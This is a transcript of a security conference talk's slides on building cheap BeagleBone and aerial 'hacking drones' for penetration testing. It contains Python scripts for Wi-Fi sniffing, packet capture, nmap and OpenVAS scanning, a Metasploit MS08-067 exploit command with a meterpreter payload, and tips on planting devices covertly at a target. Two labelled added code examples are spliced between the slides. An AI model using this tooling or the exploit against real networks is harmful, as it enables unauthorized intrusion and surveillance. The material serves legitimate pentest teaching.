Autonomous Remote Hacking Drones - Dr. Phil Polstra

Posted on 13-May-2015

Category: Technology

DESCRIPTION

Are you tired of running pentests from a van outside your target? Working 24x7 hunched over your laptop got you down? Wouldn't you rather drop a few hacking devices outside/inside your target and monitor the test poolside at your hotel down the street? This talk will show you how to build inexpensive hacking drones that can be controlled from up to a mile away and can be run for days on batteries. Devices can be used as pentesting desktops, hacking drones, or dropboxes with no software changes. Drone costs range from $45-$85. All hardware and software used is open source.

TRANSCRIPT

Dr. Phil Polstra (@ppolstra)

Bloomsburg University of Pennsylvania

Autonomous Remote Hacking Drones

What is this talk about?

- Hacking and/or forensics with small, low-power devices
- ARM-based BeagleBoard & BeagleBone running a full suite of security/forensics tools
- Performing coordinated attacks with networks of devices
- Using aerial drones for performing and supporting attacks
- Leveraging Python to make attacks semi-autonomous

Why You Should Care

- A full-featured Linux install for flexibility
- Low-power devices can run for days on battery power
- Small devices can be planted for later retrieval
- Network of devices enhances hacking from a distance
- Aerial drone can be flown around target
  - Can be useful for initial reconnaissance
  - May be the only practical way to access certain targets
- Aerial drone can be landed nearby (roof?)
  - Remote hacking drone
  - Router for other drones planted nearby
  - Combination router and drone

Who am I?

- Professor at Bloomsburg University of Pennsylvania
- Programming from age 8
- Hacking hardware from age 12
- Also known to fly and build airplanes

Roadmap

- Choosing a hacking platform
- Aircraft choices
- The Deck – your new favorite pen testing distro
- Solo ops with The Deck
- Networking with 802.15.4
- Building drones
- Attacking with an army of devices running The Deck
- Aerial drone scenarios
- Making attacks more autonomous with Python

Choosing a Hacking Platform

- Small
- Low-power
- Affordable
- Mature
- Networking built in
- Good USB support
- Convenient input and output

And the Winning Platform is... BeagleBone Black (aka Raspberry Pi killer)

- 3.4” x 2.1”
- <10 W (board itself <2 W)
- Only $45
- Based on 1 GHz Cortex-A8
- 512 MB RAM
- 100 Mbps Ethernet built in
- High-speed USB plus USB On-The-Go
- HDMI and LCD output
- RS-232, webcam, plentiful GPIO, and microSD

I know at least one of you will ask... Why not Raspberry Pi?

- Not as powerful
- Doesn't run Ubuntu (ARMv6 not supported)
- Not truly open (Broadcom won't release info)
- Not as mature
- Raspberry Pi costs more to build a full system
- Still limited availability (especially in the USA)
- Not as reliable (reported quality and power issues)
- Inefficient – uses more power despite running at a lower clock speed
- Limited GPIO
- GPIO is not buffered (easy to fry boards)
- Fragile design (pins vs. headers)
- Not as compact

Choosing an Aircraft

- Good payload
- Can fly in windy conditions
- Capable of vertical takeoff/landing (VTOL)
- Reasonable flight time
- Space for BeagleBone Black
- Space for Xbee
- Space for Alfa wifi adapter
- Affordable

And the winning aircraft is...

Quadshot

- Flying wing with VTOL
- Good wind tolerance
- Half a pound of payload
- Flight as an airplane is more energy efficient and helps in high winds (8-15 minutes)
- Some models use Xbee
- Built-in camera mount

The Deck – Your New Favorite Distro

- Originally developed for BeagleBoard-xM
- Ported to run on BeagleBone Black
- Optimized for the Beagles
  - Not someone's half-way effort to port a desktop distro
  - Desktop or drone
- All the packages you need (over 1600)
- Based on Ubuntu
  - Good repository support
  - Good community support
  - Minimizes need to build tools from source
- Running latest kernels

Demo 1 – Our Favorite Exploit

Demo 2 – Wifi Cracking

Demo 3 – Password Cracking

Demo 4 – WPS Cracking

Demo 5 – Pwn Win7 Like It's a Mac

Demo 6 – Clickiddies™

802.15.4 Networking

- Basics
- Hardware
- Simple case: 2 Xbee adapters
- Slightly harder case: multiple adapters one at a time
- Hard case: multiple adapters simultaneously
- Really hard case: true mesh network

802.15.4 Basics

- Typically used in low-power embedded systems
- Regular (300') and Pro (1 mi) versions
- AT and API modes of operation
- Low-speed (250 kbps max)
- Supports multiple network topologies
  - Peer to peer
  - Star
  - Mesh

Xbee Hardware

- Manufactured by Digi
- Regular and Pro formats are interchangeable and interoperable
- Power consumption at 3.3V is 50/295 mA for regular/Pro
- Uses 2 mm pin spacing
  - Most breadboards are 0.1” or 2.54 mm
  - Requires an adapter
- Several antenna options
- Be careful not to mix S1 with S2 (ZB) series, which are the same dimensions but are not compatible

Series 1 vs. Series 2

- Series 1 (the original)
  - Slightly higher power consumption (50 vs 40 mA) for regular version
  - Works out of the box
  - Not true mesh networking
- Series 2 (2B and ZB)
  - Must have firmware loaded for each function (coordinator, router, end device)
  - Every network must have a coordinator
  - Coordinators and routers may not go to sleep
  - Recommended for larger pen tests

Simple Case: 2 Xbee Adapters

- Xbee modules must be configured for the desired network topology
- Digi provides X-CTU software for configuration, but it only runs on Windows (or use Wine)
- Recently Moltosenso has released Network Manager IRON 1.0, which runs on Linux, Mac, and Windows – the free edition is sufficient for our limited usage

Configuring Xbee Modules

- Place Xbee module in USB adapter and connect to PC running X-CTU or IRON
- Select correct USB port and set baud rate (default is 9600)
- From Modem Configuration tab select Read to get current configuration
- Ensure modem is XB24 and Function Set is XBEE 802.15.4 for Series 1
- Set the channel and PAN ID (1337?), noting that these settings must be the same for all modems
- Pick a Destination Low and Destination High address for the other adapter (say 2 and 0)
- Set the My Address to a chosen value (say 01)
- Click Write to store the new config on the Xbee
- Repeat this process on the second Xbee but reverse the addresses
- The modules should now talk to each other just fine

Simple Case: Accessing your single drone

- By default Xbee adapters operate in transparent mode
- Set up a TTY on the drone and you can log in with a terminal program
  - Simple
  - Works with interactive programs
  - If you go out of range you are still connected when you return

Starting TTY on your drone

- Create a file with the following in /etc/init (Upstart names the job after the file, so call it ttyO2.conf for the start command below):

    # ttyO2 - getty
    #
    # This service maintains a getty on ttyO2 from the point the system is
    # started until it is shut down again.

    start on stopped rc RUNLEVEL=[2345]
    stop on runlevel [!2345]

    respawn
    exec /sbin/getty -8 57600 ttyO2

- Start with “sudo start ttyO2” (letter O, not a zero!)
- Use favorite terminal program to connect

Slightly Harder Case: Multiple Drones One at a Time

- Configure drones as in the single drone case but with different MY addresses
- Use a terminal program on the command console to connect to drones one at a time
- Simple: no programming required
- Must enter AT command mode to switch between drones
  - Enter “+++” (no enter) and wait for OK
  - Enter “ATDL0002 <enter>” to select drone 2
  - Enter “ATWR <enter>” to write to NVRAM
  - Enter “ATCN <enter>” to exit command mode

Slightly Harder Case: Multiple Drones Simultaneously

- API mode is used vs. AT mode
- Configure Xbee with X-CTU
  - For Series 1 stick with the 802.15.4 Function Set
  - For Series 2 (ZB)
    - Drones set to Function Set ZNET 2.5 ROUTER/END DEVICE API 1347
    - Controller set to Function Set ZNET 2.5 COORDINATOR API 1147
    - Router can be used to extend range to command console
- Multiple choices for communication
  - Java xbee-api
  - python-xbee (what I used)
  - Raw commands to TTY device
- Recommended for most situations involving 3 or more devices

Multiple Drone Communications

- Really this is a point-to-multipoint topology
- For each drone, communication appears to be simple peer-to-peer
- API mode provides better performance and allows simpler software operation
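API-mode framing, as an added example (not the talk's code and not the python-xbee library it used): it builds a TX Request to a 16-bit address, parses an RX Packet, and pulls complete frames out of a noisy serial buffer, which is also the first thing a monitoring receiver has to do before it can log what crosses an 802.15.4 link. The byte layout is the XBee API frame format (0x7E, 16-bit length, frame data, checksum = 0xFF minus the low byte of the sum of the frame data); unescaped mode (AP=1) is assumed and every sample frame is constructed from those rules.

```python
"""Build and parse XBee 802.15.4 (Series 1) API-mode frames, AP=1 (no escaping).

Added example, not the talk's code or python-xbee.  Frame: 0x7E, big-endian
16-bit length, frame data, checksum (0xFF - low byte of sum(frame data)).
API identifiers used: 0x01 TX Request (16-bit address), 0x81 RX Packet
(16-bit address).  All sample frames are constructed.
"""
import struct

START = 0x7E
API_TX_REQUEST_16 = 0x01
API_RX_PACKET_16 = 0x81


class TruncatedFrame(ValueError):
    """More bytes are needed before the frame can be parsed."""


class BadFrame(ValueError):
    """Wrong start delimiter or checksum: treat the byte as garbage and resync."""


def checksum(frame_data: bytes) -> int:
    return 0xFF - (sum(frame_data) & 0xFF)


def build_frame(frame_data: bytes) -> bytes:
    if not 1 <= len(frame_data) <= 0xFFFF:
        raise ValueError("frame data must be 1..65535 bytes")
    return bytes([START]) + struct.pack(">H", len(frame_data)) + frame_data + bytes([checksum(frame_data)])


def build_tx_request_16(frame_id: int, dest_addr: int, payload: bytes, options: int = 0) -> bytes:
    """TX Request: API id, frame id (0 suppresses the TX status reply), 16-bit destination, options, data."""
    return build_frame(struct.pack(">BBHB", API_TX_REQUEST_16, frame_id, dest_addr, options) + payload)


def parse_frame(buf: bytes):
    """Parse the frame at the start of buf; return (frame_data, unconsumed_bytes)."""
    if len(buf) < 3:
        raise TruncatedFrame("need the delimiter and length")
    if buf[0] != START:
        raise BadFrame("bad start delimiter 0x%02x" % buf[0])
    (length,) = struct.unpack(">H", buf[1:3])
    end = 3 + length
    if len(buf) < end + 1:
        raise TruncatedFrame("need %d more bytes" % (end + 1 - len(buf)))
    frame_data = buf[3:end]
    if (sum(frame_data) + buf[end]) & 0xFF != 0xFF:   # all bytes incl. checksum sum to 0xFF
        raise BadFrame("checksum mismatch")
    return frame_data, buf[end + 1:]


def parse_rx_packet_16(frame_data: bytes) -> dict:
    """RX Packet: API id, 16-bit source, RSSI (as -dBm), options, then the RF payload."""
    if len(frame_data) < 5 or frame_data[0] != API_RX_PACKET_16:
        raise ValueError("not an RX Packet (16-bit address) frame")
    source, rssi, options = struct.unpack(">HBB", frame_data[1:5])
    return {"source": source, "rssi_dbm": -rssi, "options": options, "data": frame_data[5:]}


def split_stream(buf: bytes):
    """Pull every complete, valid frame out of a serial read buffer.

    Garbage and frames with bad checksums are skipped one byte at a time so
    the parser resynchronises on the next 0x7E; a trailing partial frame is
    left for the next read.  Returns (frames, skipped_byte_count).
    """
    frames, skipped = [], 0
    while buf:
        try:
            frame_data, buf = parse_frame(buf)
            frames.append(frame_data)
        except TruncatedFrame:
            break
        except BadFrame:
            buf = buf[1:]
            skipped += 1
    return frames, skipped


if __name__ == "__main__":
    tx = build_tx_request_16(1, 0x5001, b"Hello")
    print(tx.hex())
    rx = build_frame(bytes([API_RX_PACKET_16, 0x00, 0x01, 0x28, 0x00]) + b"OK")
    frames, skipped = split_stream(b"\x00" + rx + tx[:-1])
    print(parse_rx_packet_16(frames[0]), "skipped", skipped)
```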

Multiple Drones Using Python: One Possibility

- Each drone runs a simple Python script which waits for commands and sends announcements
- Controller listens for announcements/responses and sends commands (all activity is logged)
- Upside is that it lends itself easily to scripting
- Downside is that it doesn't support interactive shells (yet)
- Announcements can be sent to controller for important events (such as successful cracking)
- Code is available at https://github.com/ppolstra

Harder Case: True Mesh Network

- Recommended when using a larger number of drones or when devices are too far apart
- Devices configured as routers or coordinators will have reduced battery life (no sleep)
- Requires Series 2 (2B or ZB) Xbee adapters
- No changes to scripts are required

True Mesh Networking (contd)

- At least one modem must have coordinator firmware
- Routers can extend range
  - Pro adapters recommended
  - Drones can use regular adapters to save power
  - Routers need not be connected to a drone
- Easier to leverage Xbee adapter sleep modes on end devices

Building Drones


Getting The Deck

- Download the archive from http://sourceforge.net/projects/thedeck/
- Also download the MeshDeck if using 802.15.4
- Note apt archives removed to save 1.7 GB of space
- Upload The Deck to microSD card
  - Class 10, 8 GB or larger
  - Extract archive to your Linux box
  - From your Linux box: “sudo ./setup_sd.sh --mmc /dev/sdX --uboot bone”
  - Will take a while (20-30 minutes)
- Ready-to-run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm
- If running the MeshDeck
  - Extract the archive to the drone
  - Run the install script

Power Your Drones

- Beagles take a standard 2.1 x 5.5 mm barrel connector
- Battery voltage above 5V is wasted as heat
- Bare board can run for several days off standard batteries (~220 mA)
- LCD touchscreens require lots of power!
- Leeching off of USB power from a target is ideal
- Be careful with WiFi and 802.15.4
  - Set transmit power to minimum
  - Take advantage of sleep modes on 802.15.4 radios

Power Options

Battery Size    Approx. Runtime
D               54.5 hrs
C               27.3 hrs
AA              13.6 hrs
9V or AAA       6.8 hrs
Lantern         50 hrs
USB 5200        23.6 hrs

802.15.4 Hardware

Xbee Adapters

- UART (serial) adapters
  - Can be wired directly to Beagles using 4 wires
  - Don't take up USB ports
  - Xbee cape out soon
- USB adapters
  - More expensive
  - Helpful for initial setup of modem
  - Easier to set up: just plug it in
  - Laptop connection

Wiring the Xbee to Beagles

- If you splurged for the USB adapter you can just plug it in to a USB port
  - BeagleBone has only 1 USB port, which you might want for something else (WiFi?)
  - BeagleBoard has 4 USB ports
- Using the UART interface is slightly more complicated
  - Connect 4 wires: 3.3V, Ground, TX, RX
  - Configure the Beagle multiplexer for proper operation
- If you have an Xbee cape just plug it in

Setting up a UART Interface

- Appropriate pins & modes in Beagle manuals
- For BeagleBone UART2
  - 3.3V & Ground: P9 pin 3 & 1, respectively
  - TX: P9 pin 21 (to Xbee Din)
  - RX: P9 pin 22 (to Xbee Dout)
- Add the following lines to /etc/rc.local BEFORE the exit 0 at the end:

    # setup the MeshDeck drone
    echo BB-UART2 > /sys/devices/bone_capemgr.8/slots
    sleep 2
    /etc/init.d/meshdeckd start

Capes

- Work in progress
- Xbee cape with socket for Xbee radio
- Pwnage cape
  - Xbee socket
  - Network switch for installing inline
  - USB hub
  - Optional 802.11 wireless
- AirDeck cape to fly aerial drone

Containers

Plantables

Building the AirDeck

- If you only want a router to extend range
  - Buy the Xbee board from Transition Robotics
  - Program the Xbee modem as a router
  - Install the board
- To install a drone on the Quadshot you will need
  - BBB
  - Xbee modem
  - Xbee cape (either DIY or purchased)
  - Alfa AWUS036H wireless adapter
  - 2.1 x 5.5 mm barrel connector for power
  - Short (3-6”) microUSB A-B cable

AirDeck (contd)

- Entire setup installed on brain cover
- Place BBB on cover as shown; mark 4 hole locations with 1/8” drill bit
- Connect to lid using 4-40 screws and standoffs or similar
- 3 nuts per screw
  - 1 on outside to secure screw
  - 2 to lock BBB on lid
- Remove the BBB from the lid
- Take the Alfa out of its case
- Test fit it to the inside of the cover as shown
- Mark the location of the 3/8” hole for the antenna
- Drill the 3/8” hole, then install on lid to mark mount holes
- Drill mount holes
- Install with 4-40 screws
- Seal with black tape to prevent shorting with LIA board
- Cut notches for power cable and USB cable as shown in pictures using a rotary tool
- You may have to cut back the hard plastic and/or metal shield on the USB cable
- Solder the 2.1 x 5.5 barrel connector
  - Center is connected to Vcc on LIA
  - Outer conductor is connected to Ground on LIA
  - UART connectors on upper left are probably the best choice for connection
- Install Xbee cape and secure with cable ties
- Install lid and plug in barrel connector
- Go forth and pwn!

AirDeck Ready for Pwnage

Networked Attacks – Simplest Case

- In the simplest case there is only 1 drone
- Networking is peer-to-peer
- Allows hacking from a distance
  - Better WiFi hacking when drone is in building
  - Drone runs 24x7
  - Drone can run for days off battery
  - Important updates such as successfully cracked passwords can be sent to master periodically in case you weren't in range when they happened
- Drone has full version of The Deck – lots of possibilities
- Less conspicuous than sitting outside the building
- If you are lucky you can patch into the wired network
- If you are extra lucky they use Power over Ethernet!

Networked Attack with Multiple Drones

- One process on master monitors status updates from all drones
- Interactive shell into each drone
  - Multiple subshells can be created
  - Processing continues if master disconnects
- Endless possibilities since each drone has full version of The Deck
- Drones are easily retasked based on objectives achieved by other drones

Demo 7 – Trivial Example of Two Drones in TTY Mode

Demo 8 – Trivial Example with Two Drones – API Mode Using Python

AirDeck Scenario 1

- Router only mode
- Used to extend the range of drones planted near target
- Drones may be using regular Xbee adapters to save power
- Flyby if there are no good landing spots nearby
- Land if possible
  - Flat roof could be a good choice
  - Router can run for days off Quadshot battery

AirDeck Scenario 2

- AirDeck is the only drone
- Useful when drones can't be easily planted
- Battery on Quadshot allows extended operation
- Best situation allows you to land on a roof where the AirDeck isn't detected
- If you screw up and crash on the roof you may still be able to retrieve “your RC toy” from target later

AirDeck Scenario 3

- AirDeck combined with other drones
- Other drones are planted
  - Inside, leeching power from target
  - Outside, running off of battery
- Other drones likely using regular Xbee adapters to save power
- AirDeck Xbee adapter configured as a coordinator or router

Automating with Python

Detecting Wireless Networks

    # Python 2 syntax, as in the talk
    from scapy.all import *

    # create a list to store networks
    ap_list = []

    # define a function to be called with each received packet
    def packet_handler(pkt):
        # is this an 802.11 packet, in particular a beacon frame?
        if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8:
            # is this a network that I used to know?
            if pkt.addr2 not in ap_list:
                ap_list.append(pkt.addr2)
                # assumes the DS Parameter Set (channel) is the third tagged element
                print "Network %s with ESSID %s detected on channel %s " % \
                    (pkt.addr2, pkt.info, str(ord(pkt[Dot11Elt:3].info)))

    # main function sniffs for a minute then exits
    def main():
        print "Sniffing for wireless networks"
        sniff(iface="mon0", prn=packet_handler, timeout=60)
        print "All done"

    if __name__ == '__main__':
        main()
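The beacon parsing above leans on scapy and reads the channel from the third tagged element (pkt[Dot11Elt:3]), which breaks when elements are ordered differently or the DS Parameter Set is absent (5 GHz beacons). As an added example that is not the talk's code, this walks the beacon's tagged parameters by element ID with plain Python, survives truncated elements, and applies the same fields a wireless IDS uses: it reports BSSIDs that are not on an allow-list of known access points. The frames at the bottom are constructed test data and the allow-list is a placeholder.

```python
"""Parse 802.11 beacon frames without scapy and flag BSSIDs that are not on an allow-list.

Added example, not the talk's code.  A beacon is a management frame (type 0,
subtype 8): 24-byte MAC header, 12 bytes of fixed fields, then tagged
parameters as (ID, length, value).  Sample frames are constructed.
"""
import struct

IE_SSID = 0        # element ID of the SSID
IE_DS_PARAMS = 3   # element ID of the DS Parameter Set (1 byte: channel)
FIXED_FIELDS = 12  # timestamp (8) + beacon interval (2) + capability info (2)
MAC_HEADER = 24    # frame control, duration, addr1-3, sequence control


def parse_ies(body: bytes) -> dict:
    """Walk the tagged parameters after the fixed fields.

    A truncated element ends the walk instead of raising; the first copy of a
    duplicated element ID wins.
    """
    ies, pos = {}, FIXED_FIELDS
    while pos + 2 <= len(body):
        ie_id, ie_len = body[pos], body[pos + 1]
        value = body[pos + 2:pos + 2 + ie_len]
        if len(value) < ie_len:
            break
        ies.setdefault(ie_id, value)
        pos += 2 + ie_len
    return ies


def parse_beacon(frame: bytes) -> dict:
    """Return bssid, ssid, channel and a hidden-SSID flag for one beacon frame (no FCS)."""
    if len(frame) < MAC_HEADER + FIXED_FIELDS:
        raise ValueError("frame too short for a beacon")
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0 or (fc >> 4) & 0xF != 8:  # type 0 (management), subtype 8 (beacon)
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])  # addr3 carries the BSSID
    ies = parse_ies(frame[MAC_HEADER:])
    ssid = ies.get(IE_SSID, b"")
    ds = ies.get(IE_DS_PARAMS)
    return {
        "bssid": bssid,
        "ssid": ssid.decode("utf-8", "replace"),
        "channel": ds[0] if ds else None,  # None when the element is missing or empty
        "hidden": len(ssid) == 0,
    }


def unknown_aps(frames, allowed_bssids) -> list:
    """Beacons whose BSSID is not in the allow-list, one entry per BSSID."""
    seen, found = set(), []
    for frame in frames:
        try:
            ap = parse_beacon(frame)
        except ValueError:
            continue  # not a beacon, or malformed: skip it
        if ap["bssid"] in allowed_bssids or ap["bssid"] in seen:
            continue
        seen.add(ap["bssid"])
        found.append(ap)
    return found


def make_beacon(bssid: bytes, ssid: bytes, channel=None) -> bytes:
    """Construct a minimal beacon frame for testing (not captured traffic)."""
    header = bytes([0x80, 0x00]) + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0401)  # timestamp, interval, capabilities
    body += bytes([IE_SSID, len(ssid)]) + ssid
    body += bytes([1, 1, 0x82])                           # supported rates: 1 Mbps (basic)
    if channel is not None:
        body += bytes([IE_DS_PARAMS, 1, channel])
    return header + body


SAMPLE_FRAMES = [  # constructed
    make_beacon(bytes.fromhex("001122334455"), b"corp-wifi", 6),
    make_beacon(bytes.fromhex("001122334455"), b"corp-wifi", 6),   # duplicate beacon
    make_beacon(bytes.fromhex("66778899aabb"), b"", 11),           # hidden SSID
    make_beacon(bytes.fromhex("ccddeeff0011"), b"corp-wifi-5g"),   # no DS Parameter Set
    make_beacon(bytes.fromhex("0a0b0c0d0e0f"), b"x", 1)[:-1],      # truncated last element
    b"\x08\x00" + b"\x00" * 40,                                    # a data frame, ignored
]
ALLOWED = {"00:11:22:33:44:55"}  # placeholder allow-list of known corporate BSSIDs

if __name__ == "__main__":
    for ap in unknown_aps(SAMPLE_FRAMES, ALLOWED):
        print(ap)
```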

Capturing Wireless Packets

    # Python 2 syntax, as in the talk
    from scapy.all import *
    import optparse

    # lists to store clients seen and every packet captured
    client_list = []
    pkt_list = []

    # define a function to be called with each received packet
    def packet_handler(pkt):
        # is this an 802.11 packet?  Keep every one for the pcap
        if pkt.haslayer(Dot11):
            pkt_list.append(pkt)
            # is this a client that I used to know?
            if pkt.addr2 not in client_list:
                client_list.append(pkt.addr2)
                print "Client: " + str(pkt.addr2) + " detected"

    def main():
        # parse command line options
        parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>')
        parser.add_option('-b', dest='bssid', type='string', help='target BSSID')
        parser.add_option('-e', dest='essid', type='string', help='target ESSID')
        (options, args) = parser.parse_args()
        bssid = options.bssid
        essid = options.essid
        # if essid and bssid aren't specified exit
        if essid is None or bssid is None:
            print parser.usage
            exit(0)
        # note: the BSSID is only reported here; the capture is not filtered by it
        print "Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid)
        sniff(iface="mon0", prn=packet_handler, timeout=60)
        pktcap = PcapWriter(essid + '.pcap', append=True, sync=True)
        pktcap.write(pkt_list)
        pktcap.close()
        print "All done"
        exit(0)

    if __name__ == '__main__':
        main()

Finding Out What's There

    # Python 2 syntax, as in the talk; requires python-nmap
    import nmap, optparse, json

    host_list = []

    def main():
        # parse command line options
        parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>')
        parser.add_option('-t', dest='target_net', type='string', help='target host or network')
        parser.add_option('-o', dest='nmops', type='string', help='additional nmap options')
        parser.add_option('-p', dest='ports', type='string', help='port(s) to scan')
        (options, args) = parser.parse_args()
        target_net = options.target_net
        nmops = options.nmops
        ports = options.ports
        # if no target is specified then exit
        if target_net is None:
            print parser.usage
            exit(0)
        # now perform the scan
        nm = nmap.PortScanner()
        # if arguments and ports aren't specified use some defaults
        if ports is None:
            ports = '1-1024'
        if nmops is None:
            nmops = '-sV -O'
        nm.scan(target_net, ports, nmops)
        # print the results
        for host in nm.all_hosts():
            # if it isn't up don't bother to print anything about it
            if nm[host]['status']['state'] == 'up':
                host_list.append(nm[host])
                print '---------------------------------'
                if nm[host].has_key('addresses'):
                    print "live host detected at %s " % (nm[host]['addresses']['ipv4'])
                else:
                    print "live host detected at %s " % (nm[host]['hostname'])
                # now iterate over services
                if 'tcp' in nm[host].keys():
                    print 'TCP services detected on the following ports:'
                    for port in nm[host]['tcp']:
                        print "Port: " + str(port)
                        for k, v in nm[host]['tcp'][port].items():
                            print "    " + str(k) + ": " + str(v)
                if 'udp' in nm[host].keys():
                    print 'UDP services detected on the following ports:'
                    for port in nm[host]['udp']:
                        print "Port: " + str(port)
                        for k, v in nm[host]['udp'][port].items():
                            print "    " + str(k) + ": " + str(v)
        # save the live hosts for the next stage (the OpenVAS script reads this file)
        fp = open('nmap-scan.json', 'wb')
        json.dump(host_list, fp)
        fp.close()

    if __name__ == '__main__':
        main()

Detecting the Vulnerable

    # Python 2 syntax, as in the talk; requires the OpenVAS omplib Python bindings
    import optparse, json, time, xml.etree.ElementTree as ET
    import openvas.omplib

    def main():
        # parse command line options; -h is used for the OpenVAS host here, so
        # optparse's built-in -h/--help must be disabled or add_option('-h') fails
        parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>',
                                       add_help_option=False)
        parser.add_option('-u', dest='user', type='string', help='OpenVAS user')
        parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost')
        parser.add_option('-p', dest='password', type='string', help='OpenVAS password')
        (options, args) = parser.parse_args()
        user = options.user
        password = options.password
        ovhost = options.ovhost
        # if no user specified then exit
        if user is None:
            print parser.usage
            exit(0)
        if ovhost is None:
            ovhost = 'localhost'
        # load the host list from the JSON file written by the nmap script
        fp = open('nmap-scan.json', 'rb')
        host_list = json.load(fp)
        fp.close()
        # create the comma-separated list of targets from the nmap scan results
        targets = ""
        for host in host_list:
            targets += str(host['addresses']['ipv4']) + ','
        targets = targets.rstrip(',')
        # now do the scan
        manager = openvas.omplib.OMPClient(host=ovhost)
        manager.open(user, password)
        manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan')
        task_id = manager.create_task('openvas-scan', target='nmap-targets')
        report_id = manager.start_task(task_id)
        # it will take some time for this scan to run so check every minute
        while True:
            time.sleep(60)
            status = manager.get_task_status(task=task_id)
            if "done" in status.itervalues():
                break
        report = manager.get_report(report_id)
        print ET.tostring(report)

    if __name__ == '__main__':
        main()

Script-based Exploitation

- General format:

    msfcli /exploit/platform/type/exploit RHOST=<target address> PAYLOAD=platform/payload/bind_method OPTIONX=something OPTIONY=something

- For example:

    msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp

Future Directions

- Continue to add useful packages as need arises
- Optimize some packages for BB-xM/BBB
- Optimize and expand 802.15.4 code
- Other output devices
- Exploit USB OTG functionality
- Replace LIA autopilot with BBB in AirDeck drone
- Hack over the Internet with 802.15.4 gateway

Coming Soon

Use coupon code CNF314 for 30% off this and ANY Syngress title

Questions? Feel free to track me down during the con or @ppolstra later